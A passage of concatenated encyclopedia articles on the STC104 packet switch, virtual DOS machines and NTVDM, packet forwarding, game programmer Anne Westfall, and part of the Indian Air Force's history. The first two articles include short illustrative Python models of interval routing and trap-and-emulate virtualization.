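A small software model can make the interval lookup and header-deletion behaviour described above concrete. The interval table, link numbers and deletion flags below are invented for illustration; the STC104 itself performs this lookup in configurable hardware rather than software.

```python
# Illustrative only: software model of interval routing with optional
# header deletion, in the spirit of the scheme described above.
import bisect

class IntervalRouter:
    def __init__(self, boundaries, links, delete_header):
        # Destinations below boundaries[0] use interval 0, destinations below
        # boundaries[1] use interval 1, and so on; anything at or above the
        # last boundary falls into the final interval.
        self.boundaries = boundaries        # sorted upper bounds (exclusive)
        self.links = links                  # output link per interval
        self.delete_header = delete_header  # per-link header-deletion flag

    def route(self, packet):
        dest = packet[0]                    # leading header = destination
        link = self.links[bisect.bisect_right(self.boundaries, dest)]
        if self.delete_header[link]:
            packet = packet[1:]             # next header now leads the packet
        return link, packet

# Invented table: destinations 0-15 on link 0, 16-31 on link 1, 32+ on link 2.
router = IntervalRouter(
    boundaries=[16, 32],
    links=[0, 1, 2],
    delete_header={0: False, 1: False, 2: True},  # link 2 feeds the next stage
)

print(router.route([20, 42, 99]))   # (1, [20, 42, 99])
print(router.route([42, 7, 99]))    # (2, [7, 99]) after header deletion
```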
Header deletion can also be used to implement two-phase randomized routing. Two-phase randomized routing is a method for preventing network contention; it works by routing each packet to a randomly chosen intermediate node before routing it to its destination. The effect is to reduce all traffic to an average worst case with predictable latency and bandwidth. Two-phase randomized routing is implemented by the STC104 by setting up links where traffic enters the network to prepend a header with a random destination. The destination is another STC104 device, which recognises the header and discards it before routing the packet to its actual destination. Since randomly routing messages via an intermediate destination can create cyclic dependencies between different packets, deadlock can occur. However, deadlock can be avoided by partitioning the network into two components: one for the randomizing phase and one for the destination phase.
Network topologies
The STC104 can be used to construct a variety of network topologies, including multi-dimensional grids and tori, hypercubes and Clos networks (and the closely related fat tree).
DS Links
The STC104 links are called DS-Links. A single DS-Link is a unidirectional, asynchronous, flow-controlled connection that operates serially, with a bandwidth of up to 100 Mbit/s. Physically, a DS-Link is implemented with two wires: a data wire that carries the signal and a strobe that changes only when the data does not. The strobe signal allows the transmitter's clock to be recovered by the receiver, and for the receiver to synchronise to it. This allows the transmitter and receiver to maintain their own clocks with potentially varying frequency and phase.
A DS-Link implements transfer of data on the wires using a token protocol. A token can either carry one byte of data or a control message, such as flow control, end of packet, or end of message. A single bit distinguishes the token type, and an additional parity bit is used for error detection. A byte is therefore encoded in 10 bits and a control token is encoded in 4 bits. Each DS-Link has a buffer large enough to store eight tokens. To prevent tokens from being received when the buffer is full, a token-level flow control mechanism is used. This mechanism automatically sends control tokens to the sender when there is space in the buffer.
Microarchitecture
The STC104 can be classified as a special-purpose MIMD processor with distributed control. The main components are 32 link slices that are connected to the crossbar, and logic for global services such as initialisation and reset. Each link slice provides a single input and output with a pair of DS-Links and additional logic to implement the routing functionality and provide buffering. The link slices operate concurrently and independently, with their state determined only by their configuration parameters and the data flowing through them.
Physical implementation
The STC104 was designed and manufactured on a 1.0 micron CMOS process (SGS-Thomson HCMOS4) with three metal layers for routing. The chip had an area of approximately 204.6 mm², contained 1.875 million transistors, and dissipated up to 5 W of power operating at 50 MHz.
Notes
References
See also
Transputer
Inmos
Communicating sequential processes
External links
Networks, Routers and Transputers: Function, Performance and Applications
SGS-Thomson Microelectronics, STC104 asynchronous packet switch engineering data
David May's Transputer Page
Flow control (data) Switches Routing
1501173
https://en.wikipedia.org/wiki/Virtual%20DOS%20machine
Virtual DOS machine
Virtual DOS machines (VDMs) refer to a technology that allows 16-bit/32-bit DOS and 16-bit Windows programs to run when another operating system is already running and controlling the hardware. It is a userland technology that originated in earlier versions of Windows and was included up to Windows 10.
Overview
Virtual DOS machines can operate either exclusively through typical software emulation methods (e.g. dynamic recompilation) or can rely on the virtual 8086 mode of the Intel 80386 processor, which allows real mode 8086 software to run in a controlled environment by catching all operations which involve accessing protected hardware and forwarding them to the normal operating system (as exceptions). The operating system can then perform an emulation and resume the execution of the DOS software (a simplified sketch of this trap-and-emulate flow appears below). VDMs generally also implement support for running 16- and 32-bit protected mode software (DOS extenders), which has to conform to the DOS Protected Mode Interface (DPMI).
When a DOS program running inside a VDM needs to access a peripheral, Windows will either allow this directly (rarely), or will present the DOS program with a virtual device driver (VDD) which emulates the hardware using operating system functions. A VDM will systematically have emulations for the Intel 8259A interrupt controllers, the 8254 timer chips, the 8237 DMA controller, etc.
Concurrent DOS 8086 emulation mode
In January 1985, Digital Research, together with Intel, previewed Concurrent DOS 286 1.0, a version of Concurrent DOS capable of running real mode DOS programs in the 80286's protected mode. However, the method, devised on B-1 stepping processor chips, stopped working in May 1985 on the C-1 and subsequent processor steppings, shortly before Digital Research was about to release the product. Although Intel started to address the issues with the E-1 stepping in August 1985, so that Digital Research's "8086 emulation mode" worked again by utilizing the undocumented LOADALL processor instruction, it was too slow to be practical. Microcode changes for the E-2 stepping improved the speed again. This early implementation can be seen as a predecessor to actual virtual DOS machines.
Eventually, Concurrent DOS 286 was reworked from a potential desktop operating system to become FlexOS 286 for industrial use in 1986. It was also licensed by IBM for their 4680 OS in 1986. When Intel's 80386 with its virtual 8086 mode became available (as samples since October 1985 and in quantities since June 1986), Digital Research switched to using this to run real mode DOS programs in virtual DOS machines in protected mode under Concurrent DOS 386 1.0 (February 1987) and FlexOS 386 1.0 (June 1987). However, the architecture of these multiuser multitasking protected mode operating systems was not itself DOS-based. Concurrent DOS 386 was later developed to become Multiuser DOS (since 1991) and REAL/32 (since 1995). FlexOS 386 later became 4690 OS in 1993.
DOS-based VDMs
In contrast to these protected mode operating systems, DOS, by default, is a real-mode operating system, switching to protected mode and virtual 86 mode only on behalf of memory managers and DOS extenders in order to provide access to extended memory or to map memory into the first megabyte, which is accessible to normal DOS programs.
DOS-based VDMs appeared with Microsoft's Windows/386 2.01 in September 1987. DOS-based virtual DOS machines were also present in Windows 3.0, 3.1x and Windows for Workgroups 3.1x running in 386 Enhanced Mode as well as in Windows 95, 98, 98 SE and ME.
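The trap-and-emulate flow outlined in the overview can be illustrated with a deliberately simplified software model. Everything here is hypothetical: the guest interface, the trapped-event encoding and the single emulated timer port stand in for the CPU and exception machinery that a real VDM relies on.

```python
# Illustrative only: a toy trap-and-emulate loop in the spirit of a VDM.
# Real VDMs rely on CPU support (virtual 8086 mode) and OS exception
# handling; the guest, events and device model below are hypothetical.

class VirtualTimer:
    """Stands in for an emulated 8254 timer channel (I/O port 0x40)."""
    def __init__(self):
        self.counter = 0xFFFF
    def read(self):
        self.counter = (self.counter - 1) & 0xFFFF  # pretend the count ticks down
        return self.counter & 0xFF

class ScriptedGuest:
    """Fake 'real mode program': yields the privileged operations it attempts."""
    def __init__(self, trapped_ops):
        self.trapped_ops = iter(trapped_ops)
    def run_until_trap(self):
        return next(self.trapped_ops, ("HLT", None))
    def deliver_result(self, value):
        print("guest received I/O result:", hex(value))

def run_vdm(guest):
    devices = {0x40: VirtualTimer()}            # virtual device per I/O port
    while True:
        op, port = guest.run_until_trap()       # run until a privileged op faults
        if op == "IN":                          # guest read from an I/O port
            dev = devices.get(port)
            guest.deliver_result(dev.read() if dev else 0xFF)
        elif op == "OUT":
            pass                                # a fuller monitor would update device state
        elif op == "HLT":
            break                               # guest finished; tear down the VDM

run_vdm(ScriptedGuest([("IN", 0x40), ("IN", 0x40), ("HLT", None)]))
```

In a real VDM the "guest" is an actual real-mode program executing on the CPU in virtual 8086 mode, and the traps are hardware exceptions handled by the operating system rather than Python objects.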
One of the characteristics of these DOS-based solutions is that the memory layout shown inside a virtual DOS machine is a virtual instance of the DOS system and DOS driver configuration that was run before the multitasker was loaded, and that requests which cannot be handled in protected mode are passed down into the system domain to be executed by the underlying DOS system.
Similar to Windows 3.x 386 Enhanced Mode in architecture, EMM386 3.xx of Novell DOS 7, Caldera OpenDOS 7.01, and DR-DOS 7.02 (and later) also uses DOS-based VDMs to support pre-emptive multitasking of multiple DOS applications, when the EMM386 /MULTI option is used. This component had been under development at Digital Research / Novell since 1991 under the codename "Vladivar" (originally as a separate device driver, KRNL386.SYS, instead of a module of EMM386). While primarily developed for the next major version of DR DOS, released as Novell DOS 7 in 1994, it was also used in the never-released DR DOS "Panther" and "Star Trek" projects in 1992/1993.
OS/2 MVDM
VDMs called MVDMs (Multiple Virtual DOS Machines) are used in OS/2 2.0 and later, since 1992. OS/2 MVDMs are considerably more powerful than NTVDM. For example, block devices are supported, and various DOS versions can be booted into an OS/2 MVDM. While the OS/2 1.x DOS box was based on DOS 3.0, OS/2 2.x MVDMs emulate DOS 5.0. Seamless integration of Windows 3.1 and later Win32s applications in OS/2 is a concept that looks similar on the surface to the seamless integration of XP Mode, based on Windows Virtual PC, in Windows 7. A redirector in a "guest" VDM or NTVDM allows access to the disks of the OS/2 or NT "host". Applications in a "guest" can use named pipes for communication with their "host". Due to a technical limitation, DOS and 16-bit Windows applications under OS/2 were unable to see more than 2 GB of hard drive space; this was fixed in ArcaOS 5.0.4.
Windows NTVDM
NTVDM is a system component of all IA-32 editions of the Windows NT family, from the release of Windows NT 3.1 in 1993 until its final appearance in Windows 10 in 2015, which allows execution of 16-bit Windows and 16-bit/32-bit DOS applications. It is not included with 64-bit versions. The Windows NT 32-bit user-mode executable which forms the basis for a single DOS (or Windows 3.x) environment is called ntvdm.exe.
In order to execute DOS programs, NTVDM loads NTIO.SYS, which in turn loads NTDOS.SYS, which executes a modified COMMAND.COM in order to run the application that was passed to NTVDM as a command-line argument. The 16-bit real-mode system files are stripped-down derivations of their MS-DOS 5.0 equivalents IO.SYS, MSDOS.SYS and COMMAND.COM, with all hard-wired assumptions about the FAT file system removed and using the invalid opcode sequence 0xC4 0xC4 to "bop" down into the 32-bit NTVDM to handle the requests. Originally, NTDOS reported a DOS version of 30.00 to programs, but this was soon changed to report a version of 5.00 at INT 21h/AH=30h and 5.50 at INT 21h/AX=3306h to allow more programs to run unmodified. This holds true even in the newest releases of Windows; many additional MS-DOS functions and commands introduced in MS-DOS versions 6.x and in Windows 9x are missing.
16-bit Windows applications by default all run in their own thread within a single NTVDM process. Although NTVDM itself is a 32-bit process and pre-emptively multitasked with respect to the rest of the system, the 16-bit applications within it are cooperatively multitasked with respect to each other.
When the "Run in separate memory space" option is checked in the Run box or the application's shortcut file, each 16-bit Windows application gets its own NTVDM process and is therefore pre-emptively multitasked with respect to other processes, including other 16-bit Windows applications. NTVDM emulates BIOS calls and tables as well as the Windows 3.1 kernel and 16-bit API stubs. The 32-bit WoW translation layer thunks 16-bit API routines. 32-bit DOS emulation is present for DOS Protected Mode Interface (DPMI) and 32-bit memory access. This layer converts the necessary extended and expanded memory calls for DOS functions into Windows NT memory calls. wowexec.exe is the emulation layer that emulates 16-bit Windows. Windows 2000 and Windows XP added Sound Blaster 2.0 emulation. 16-bit virtual device drivers and DOS block device drivers (e.g., RAM disks) are not supported. Inter-process communication with other subsystems can take place through OLE, DDE and named pipes. Since virtual 8086 mode is not available on non-x86-based processors (more specifically, MIPS, DEC Alpha, and PowerPC) NTVDM was instead implemented as a full emulator in these versions of NT, using code licensed from Insignia's SoftPC. Up to Windows NT 3.51, only 80286 emulation was available. With Windows NT 4.0, 486 emulation was added. With Windows 11 dropping support for 32-bit IA-32 processors, development of NTVDM has been discontinued. Commands The following list of commands is part of the Windows XP MS-DOS subsystem. APPEND DEBUG EDIT EDLIN EXE2BIN FASTOPEN FORCEDOS GRAPHICS LOADFIX LOADHIGH (LH) MEM NLSFUNC SETVER SHARE Security issue In January 2010, Google security researcher Tavis Ormandy revealed a serious security flaw in Windows NT's VDM implementation that allowed unprivileged users to escalate their privileges to SYSTEM level, noted as applicable to the security of all x86 versions of the Windows NT kernel since 1993. This included all 32-bit versions of Windows NT, 2000, XP, Server 2003, Vista, Server 2008, and Windows 7. Ormandy published a proof-of-concept exploit for the vulnerability. Prior to Microsoft's release of a security patch, the workaround for this issue was to turn off 16-bit application support, which prevented older programs (those written for DOS and Windows 3.1) from running. 64-bit versions of Windows were not affected since NTVDM subsystem is not installed by default. Once the Microsoft security patches had been applied to the affected operating systems the VDM could be safely reenabled. Limitations A limitation exists in the Windows XP 16-bit subsystem (but not in earlier versions of Windows NT) because of the raised per-session limit for GDI objects which causes GDI handles to be shifted to the right by two bits, when converting them from 32 to 16 bits. As a result, the actual handle cannot be larger than 14 bits and consequently 16-bit applications that happen to be served a handle larger than 16384 by the GDI system crash and terminate with an error message. In an x86-64 CPU, virtual 8086 mode is available as a sub-mode only in its legacy mode (for running 16- and 32-bit operating systems), not in the native 64-bit long mode. The NTVDM is not supported on x86-64 editions of Windows, including DOS programs, because NTVDM uses VM86 CPU mode instead of the Local Descriptor Table in order to enable 16‑bits segment required for addressing and AArch64 because Microsoft did not release a full emulator for this incompatible instruction set like it did on previous incompatible architecture. 
However, they can still be run using virtualization software, like Windows XP Mode in Windows 7 or VMware Workstation, or by installing NTVDMx64, an unofficial port of the older emulated implementation of the NTVDM which was provided on NT 4 for non-x86 platforms. Another option is OTVDM (WineVDM), a 16-bit Windows interpreter based on MAME's i386 emulation and the 16-bit part of the popular Windows compatibility layer Wine.
In general, VDM and similar technologies do not satisfactorily run most older DOS games on today's computers. Emulation is only provided for the most basic peripherals, often implemented incompletely. For example, sound emulation in NTVDM is very limited. NT-family versions of Windows only update the real screen a few times per second when a DOS program writes to it, and they do not emulate higher resolution graphics modes. Because software mostly runs natively at the speed of the host CPU, all timing loops will expire prematurely. This either makes a game run much too fast or causes the software not even to notice the emulated hardware peripherals, because it does not wait long enough for an answer.
See also
Comparison of platform virtualization software
DESQview 386 (since 1988)
Wine (software)
DOSBox
DOSEMU
Merge (software)
List of Microsoft Windows components
Hypervisor
Windows on Windows (WoW)
Virtual machine (VM)
Notes
References
Further reading
External links
Virtual DOS Machine Structure
Troubleshooting MS-DOS-based programs in Windows XP
Troubleshooting an MS-DOS application which hangs the NTVDM subsystem in Windows XP and Windows Server 2003
Troubleshooting MS-DOS-based serial communication programs in Windows 2000 and later
MS-DOS Player for Win32-x64, an emulator of Microsoft MS-DOS, runs many command line DOS programs like compilers or other tools, also packaged into one stand-alone executable file.
vDOS, a DOS emulator designed for running the more "serious" DOS apps (not games) on 64-bit NT systems (effectively a replacement for NTVDM on modern systems).
Virtualization software DOS technology Windows administration DOS emulators Windows components
1073520
https://en.wikipedia.org/wiki/Packet%20forwarding
Packet forwarding
Packet forwarding is the relaying of packets from one network segment to another by nodes in a computer network. The network layer in the OSI model is responsible for packet forwarding.
Models
The simplest forwarding model, unicasting, involves a packet being relayed from link to link along a chain leading from the packet's source to its destination. However, other forwarding strategies are commonly used. Broadcasting requires a packet to be duplicated and copies sent on multiple links with the goal of delivering a copy to every device on the network. In practice, broadcast packets are not forwarded everywhere on a network, but only to devices within a broadcast domain, making broadcast a relative term. Less common than broadcasting, but perhaps of greater utility and theoretical significance, is multicasting, where a packet is selectively duplicated and copies delivered to each of a set of recipients.
Networking technologies tend to naturally support certain forwarding models. For example, fiber optics and copper cables run directly from one machine to another to form natural unicast media: data transmitted at one end is received by only one machine at the other end. However, as illustrated in the diagrams, nodes can forward packets to create multicast or broadcast distributions from naturally unicast media. Likewise, traditional Ethernet networks (10BASE5 and 10BASE2, but not the more modern 10BASE-T) are natural broadcast media: all the nodes are attached to a single long cable, and a packet transmitted by one device is seen by every other device attached to the cable. Ethernet nodes implement unicast by ignoring packets not directly addressed to them. A wireless network is naturally multicast: all devices within the reception radius of a transmitter can receive its packets. Wireless nodes ignore packets addressed to other devices, but require forwarding to reach nodes outside their reception radius.
Decisions
At nodes where multiple outgoing links are available, the choice of which link or links to use for forwarding a given packet requires a decision-making process that, while simple in concept, is sometimes bewilderingly complex. Since a forwarding decision must be made for every packet handled by a node, the total time required for this can become a major limiting factor in overall network performance. Much of the design effort of high-speed routers and switches has been focused on making rapid forwarding decisions for large numbers of packets.
The forwarding decision is generally made using one of two processes: routing, which uses information encoded in a device's address to infer its location on the network, or bridging, which makes no assumptions about where addresses are located and depends heavily on broadcasting to locate unknown addresses. The heavy overhead of broadcasting has led to the dominance of routing in large networks, particularly the Internet; bridging is largely relegated to small networks where the overhead of broadcasting is tolerable. However, since large networks are usually composed of many smaller networks linked together, it would be inaccurate to state that bridging has no use on the Internet; rather, its use is localized.
Methods
A node can use one of two different methods to forward packets: store-and-forward or cut-through switching.
See also
Equal-cost multi-path routing
Forwarding information base
Node-to-node data transfer
Per-hop behaviour
Port forwarding
References
Routing
1162451
https://en.wikipedia.org/wiki/Anne%20Westfall
Anne Westfall
Anne Westfall is an American game programmer and software developer, known for 1983's Archon: The Light and the Dark, originally written for the Atari 8-bit family. She is married to fellow game developer Jon Freeman. Both are founders of Free Fall Associates.
Career
Westfall began computer programming at the age of 30. Before moving into the video game industry, Westfall worked as a programmer for Morton Technology, a civil engineering firm, where she developed the first microcomputer-based program designed to help lay out subdivisions.
In 1981, Westfall and her husband, Jon, left Epyx, the video game developer and publisher he had co-founded just three years earlier. Westfall cited a desire to learn assembly language and to work on the Atari 800 as one reason for their departure from Epyx. Together with game designer Paul Reiche III, they started Free Fall Associates to make computer games free of the politics existing at the now larger Epyx. Working with Jon and Reiche, she helped develop the two award-winning and highly acclaimed games Archon and Archon II, handling the brunt of the programming work.
For six years, Westfall was on the board of directors of the Computer Game Developers Conference.
Personal
Westfall met Jon at the West Coast Computer Faire in 1980 while demonstrating the surveying program she had written for the TRS-80. Her booth was next to that of Automated Simulations (later Epyx), where Jon was working. After dating for about six months, Freeman convinced Westfall to move closer and come to work at his company.
See also
List of women in the video game industry
Women and video games
Women in computing
References
External links
MobyGames' entry on Westfall
Free Fall Associates chapter of Halcyon Days: Interviews with Classic Computer and Video Game Programmers
American computer programmers Video game programmers Year of birth missing (living people) Living people Women video game programmers Computer programmers
403355
https://en.wikipedia.org/wiki/Indian%20Air%20Force
Indian Air Force
The Indian Air Force (IAF) is the air arm of the Indian Armed Forces. Its complement of personnel and aircraft assets ranks fourth amongst the air forces of the world. Its primary mission is to secure Indian airspace and to conduct aerial warfare during armed conflict. It was officially established on 8 October 1932 as an auxiliary air force of the British Empire, which honoured India's aviation service during World War II with the prefix Royal. After India gained independence from the United Kingdom in 1947, the name Royal Indian Air Force was kept, and the force served in the name of the Dominion of India. With the government's transition to a republic in 1950, the prefix Royal was removed.
Since 1950, the IAF has been involved in four wars with neighbouring Pakistan. Other major operations undertaken by the IAF include Operation Vijay, Operation Meghdoot, Operation Cactus and Operation Poomalai. The IAF's mission expands beyond engagement with hostile forces, with the IAF participating in United Nations peacekeeping missions.
The President of India holds the rank of Supreme Commander of the IAF. A total of 1,39,576 personnel are in service with the Indian Air Force. The Chief of the Air Staff, an air chief marshal, is a four-star officer and is responsible for the bulk of operational command of the Air Force. There is never more than one serving ACM at any given time in the IAF. The rank of Marshal of the Air Force has been conferred by the President of India on one occasion in history, to Arjan Singh. On 26 January 2002, Singh became the first and, so far, the only five-star rank officer of the IAF.
Mission
The IAF's mission is defined by the Armed Forces Act of 1947, the Constitution of India, and the Air Force Act of 1950. It decrees that in the aerial battlespace:
Defence of India and every part thereof including preparation for defence and all such acts as may be conducive in times of war to its prosecution and after its termination to effective demobilisation.
In practice, this is taken as a directive meaning the IAF bears the responsibility of safeguarding Indian airspace and thus furthering national interests in conjunction with the other branches of the armed forces. The IAF provides close air support to Indian Army troops on the battlefield as well as strategic and tactical airlift capabilities. The Integrated Space Cell is operated by the Indian Armed Forces, the civilian Department of Space, and the Indian Space Research Organisation. By uniting the civilian-run space exploration organisations and the military under a single Integrated Space Cell, the military is able to benefit efficiently from innovation in the civilian sector of space exploration, and the civilian departments benefit as well.
The Indian Air Force, with highly trained crews and pilots and access to modern military assets, provides India with the capacity for rapid-response evacuation, search-and-rescue (SAR) operations, and the delivery of relief supplies to affected areas via cargo aircraft. The IAF provided extensive assistance to relief operations during natural calamities such as the Gujarat cyclone in 1998, the tsunami in 2004, and the North India floods in 2013. The IAF has also undertaken relief missions such as Operation Rainbow in Sri Lanka.
History
Formation and early pilots
The Indian Air Force was established on 8 October 1932 in British India as an auxiliary air force of the Royal Air Force.
The enactment of the Indian Air Force Act 1932 stipulated out their auxiliary status and enforced the adoption of the Royal Air Force uniforms, badges, brevets and insignia. On 1 April 1933, the IAF commissioned its first squadron, No.1 Squadron, with four Westland Wapiti biplanes and five Indian pilots. The Indian pilots were led by British RAF Commanding officer Flight Lieutenant (later Air Vice Marshal) Cecil Bouchier. World War II (1939–1945) During World War II, the IAF played an instrumental role in halting the advance of the Japanese army in Burma, where the first IAF air strike was executed. The target for this first mission was the Japanese military base in Arakan, after which IAF strike missions continued against the Japanese airbases at Mae Hong Son, Chiang Mai and Chiang Rai in northern Thailand. The IAF was mainly involved in strike, close air support, aerial reconnaissance, bomber escort and pathfinding missions for RAF and USAAF heavy bombers. RAF and IAF pilots would train by flying with their non-native air wings to gain combat experience and communication proficiency. Besides operations in the Burma Theatre IAF pilots participated in air operations in North Africa and Europe. In addition to the IAF, many native Indians and some 200 Indians resident in Britain volunteered to join the RAF and Women's Auxiliary Air Force. One such volunteer was Sergeant Shailendra Eknath Sukthankar, who served as a navigator with No. 83 Squadron. Sukthankar was commissioned as an officer, and on 14 September 1943, received the DFC. Squadron Leader Sukthankar eventually completed 45 operations, 14 of them on board the RAF Museum’s Avro Lancaster R5868. Another volunteer was Assistant Section Officer Noor Inayat Khan a Muslim pacifist and Indian nationalist who joined the WAAF, in November 1940, to fight against Nazism. Noor Khan served bravely as a secret agent with the Special Operations Executive (SOE) in France, but was eventually betrayed and captured. Many of these Indian airmen were seconded or transferred to the expanding IAF such as Squadron Leader Mohinder Singh Pujji DFC who led No. 4 Squadron IAF in Burma. During the war, the IAF experienced a phase of steady expansion. New aircraft added to the fleet included the US-built Vultee Vengeance, Douglas Dakota, the British Hawker Hurricane, Supermarine Spitfire, and Westland Lysander. In recognition of the valiant service by the IAF, King George VI conferred the prefix "Royal" in 1945. Thereafter the IAF was referred to as the Royal Indian Air Force. In 1950, when India became a republic, the prefix was dropped and it reverted to being the Indian Air Force. First years of independence (1947–1950) After it became independent from the British Empire in 1947, British India was partitioned into the new states of the Dominion of India and the Dominion of Pakistan. Along the lines of the geographical partition, the assets of the air force were divided between the new countries. India's air force retained the name of the Royal Indian Air Force, but three of the ten operational squadrons and facilities, located within the borders of Pakistan, were transferred to the Royal Pakistan Air Force. The RIAF Roundel was changed to an interim 'Chakra' roundel derived from the Ashoka Chakra. Around the same time, conflict broke out between them over the control of the princely state of Jammu & Kashmir. With Pakistani forces moving into the state, its Maharaja decided to accede to India in order to receive military help. 
The day after, the Instrument of Accession was signed, the RIAF was called upon to transport troops into the war zone. And this was when a good management of logistics came into help. This led to the eruption of full-scale war between India and Pakistan, though there was no formal declaration of war. During the war, the RIAF did not engage the Pakistan Air Force in air-to-air combat; however, it did provide effective transport and close air support to the Indian troops. When India became a republic in 1950, the prefix 'Royal' was dropped from the Indian Air Force. At the same time, the current IAF roundel was adopted. Congo crisis and Annexation of Goa (1960–1961) The IAF saw significant conflict in 1960, when Belgium's 75-year rule over Congo ended abruptly, engulfing the nation in widespread violence and rebellion. The IAF activated No. 5 Squadron, equipped with English Electric Canberra, to support the United Nations Operation in the Congo. The squadron started undertaking operational missions in November. The unit remained there until 1966, when the UN mission ended. Operating from Leopoldville and Kamina, the Canberras soon destroyed the rebel Air Force and provided the UN ground forces with its only long-range air support force. In late 1961, the Indian government decided to attack the Portuguese colony of Goa after years of disagreement between New Delhi and Lisbon. The Indian Air Force was requested to provide support elements to the ground force in what was called Operation Vijay. Probing flights by some fighters and bombers were carried out from 8–18 December to draw out the Portuguese Air Force, but to no avail. On 18 December, two waves of Canberra bombers bombed the runway of Dabolim airfield taking care not to bomb the Terminals and the ATC tower. Two Portuguese transport aircraft (a Super Constellation and a DC-6) found on the airfield were left alone so that they could be captured intact. However the Portuguese pilots managed to take off the aircraft from the still damaged airfield and made their getaway to Portugal. Hunters attacked the wireless station at Bambolim. Vampires were used to provide air support to the ground forces. In Daman, Mystères were used to strike Portuguese gun positions. Ouragans (called Toofanis in the IAF) bombed the runways at Diu and destroyed the control tower, wireless station and the meteorological station. After the Portuguese surrendered the former colony was integrated into India. Border disputes and changes in the IAF (1962–1971) In 1962, border disagreements between China and India escalated to a war when China mobilised its troops across the Indian border. During the Sino-Indian War, India's military planners failed to deploy and effectively use the IAF against the invading Chinese forces. This resulted in India losing a significant amount of advantage to the Chinese; especially in Jammu and Kashmir. On 24 April 1965, an Indian Ouragan strayed over the Pakistani border and was forced to land by a Pakistani Lockheed F-104 Starfighter, the pilot was returned to India; however, the captured aircraft would be kept by the Pakistan Air Force(PAF) and ended up being displayed at the PAF museum in Peshawar. Three years after the Sino-Indian conflict, in 1965, Pakistan launched Operation Gibraltar, strategy of Pakistan to infiltrate Jammu and Kashmir, and start a rebellion against Indian rule. This came to be known as the Second Kashmir War. This was the first time the IAF actively engaged an enemy air force. 
However, instead of providing close air support to the Indian Army, the IAF carried out independent raids against PAF bases. These bases were situated deep inside Pakistani territory, making IAF fighters vulnerable to anti-aircraft fire. During the course of the conflict, the PAF enjoyed technological superiority over the IAF and had achieved substantial strategic and tactical advantage due to the suddenness of the attack and advanced state of their air force. The IAF was restrained by the government from retaliating to PAF attacks in the eastern sector while a substantive part of its combat force was deployed there and could not be transferred to the western sector, against the possibility of Chinese intervention. Moreover, international (UN) stipulations and norms did not permit military force to be introduced into the Indian state of J&K beyond what was agreed during the 1949 ceasefire. Despite this, the IAF was able to prevent the PAF from gaining air superiority over conflict zones. The small and nimble IAF Folland Gnats proved effective against the F-86 Sabres of the PAF earning it the nickname "Sabre Slayers". By the time the conflict had ended, the IAF lost 60–70 aircraft, while the PAF lost 43 aircraft. More than 60% of IAF's aircraft losses took place in ground attack missions to enemy ground-fire, since fighter-bomber aircraft would carry out repeated dive attacks on the same target. According to, Air Chief Marshal Arjan Singh of the Indian Air Force, despite having been qualitatively inferior, IAF achieved air superiority in three days in the 1965 War. After the 1965 war, the IAF underwent a series of changes to improve its capabilities. In 1966, the Para Commandos regiment was created. To increase its logistics supply and rescue operations ability, the IAF inducted 72 HS 748s which were built by Hindustan Aeronautics Limited (HAL) under licence from Avro. India started to put more stress on indigenous manufacture of fighter aircraft. As a result, HAL HF-24 Marut, designed by the famed German aerospace engineer Kurt Tank, were inducted into the air force. HAL also started developing an improved version of the Folland Gnat, known as HAL Ajeet. At the same time, the IAF also started inducting Mach 2 capable Soviet MiG-21 and Sukhoi Su-7 fighters. Bangladesh Liberation War (1971) By late 1971, the intensification of the independence movement in East Pakistan lead to the Bangladesh Liberation War between India and Pakistan. On 22 November 1971, 10 days before the start of a full-scale war, four PAF F-86 Sabre jets attacked Indian and Mukti Bahini positions at Garibpur, near the international border. Two of the four PAF Sabres were shot down and one damaged by the IAF's Folland Gnats. On 3 December, India formally declared war against Pakistan following massive preemptive strikes by the PAF against Indian Air Force installations in Srinagar, Ambala, Sirsa, Halwara and Jodhpur. However, the IAF did not suffer significantly because the leadership had anticipated such a move and precautions were taken. The Indian Air Force was quick to respond to Pakistani air strikes, following which the PAF carried out mostly defensive sorties. Within the first two weeks, the IAF had carried out almost 12,000 sorties over East Pakistan and also provided close air support to the advancing Indian Army. IAF also assisted the Indian Navy in its operations against the Pakistani Navy and Maritime Security Agency in the Bay of Bengal and Arabian Sea. 
On the western front, the IAF destroyed more than 20 Pakistani tanks, 4 APCs and a supply train during the Battle of Longewala. The IAF undertook strategic bombing of West Pakistan by carrying out raids on oil installations in Karachi, the Mangla Dam and a gas plant in Sindh. A similar strategy was also deployed in East Pakistan and, as the IAF achieved complete air superiority on the eastern front, the ordnance factories, runways, and other vital areas of East Pakistan were severely damaged. By the time Pakistani forces surrendered, the IAF had destroyed 94 PAF aircraft. The IAF was able to conduct a wide range of missions – troop support; air combat; deep penetration strikes; para-dropping behind enemy lines; feints to draw enemy fighters away from the actual target; bombing; and reconnaissance. In contrast, the Pakistan Air Force, which was solely focused on air combat, was blown out of the subcontinent's skies within the first week of the war. Those PAF aircraft that survived took refuge at Iranian air bases or in concrete bunkers, refusing to offer a fight. Hostilities officially ended at 14:30 GMT on 17 December, after the fall of Dacca on 15 December. India claimed large gains of territory in West Pakistan (although pre-war boundaries were recognised after the war), and the independence of Pakistan's East wing as Bangladesh was confirmed. The IAF had flown over 16,000 sorties on both the East and West fronts, including sorties by transport aircraft and helicopters, while the PAF flew about 30 sorties in the East and 2,840 in the West. More than 80 per cent of the IAF's sorties were close-support and interdiction, and according to neutral assessments about 45 IAF aircraft were lost, while Pakistan lost 75 aircraft, not including any F-6s, Mirage IIIs, or the six Jordanian F-104s which failed to return to their donors. The imbalance in air losses is explained by the IAF's considerably higher sortie rate and its emphasis on ground-attack missions. On the ground, Pakistan suffered most, with 9,000 killed and 25,000 wounded, while India lost 3,000 dead and 12,000 wounded. The loss of armoured vehicles was similarly imbalanced. This represented a major defeat for Pakistan. Towards the end of the war, the IAF's transport planes dropped leaflets over Dhaka urging the Pakistani forces to surrender, demoralising Pakistani troops in East Pakistan. Incidents before Kargil (1984–1988) In 1984, India launched Operation Meghdoot to capture the Siachen Glacier in the contested Kashmir region. In Operation Meghdoot, the IAF's Mi-8, Chetak and Cheetah helicopters airlifted hundreds of Indian troops to Siachen. Launched on 13 April 1984, this military operation was unique because of Siachen's inhospitable terrain and climate. The military action was successful, given the fact that under a previous agreement, neither Pakistan nor India had stationed any personnel in the area. With the success of Operation Meghdoot, India gained control of the Siachen Glacier. India has established control over the entire length of the Siachen Glacier and all of its tributary glaciers, as well as the three main passes of the Saltoro Ridge immediately west of the glacier – Sia La, Bilafond La, and Gyong La. Pakistan controls the glacial valleys immediately west of the Saltoro Ridge. According to TIME magazine, India gained a significant amount of territory because of its military operations in Siachen. 
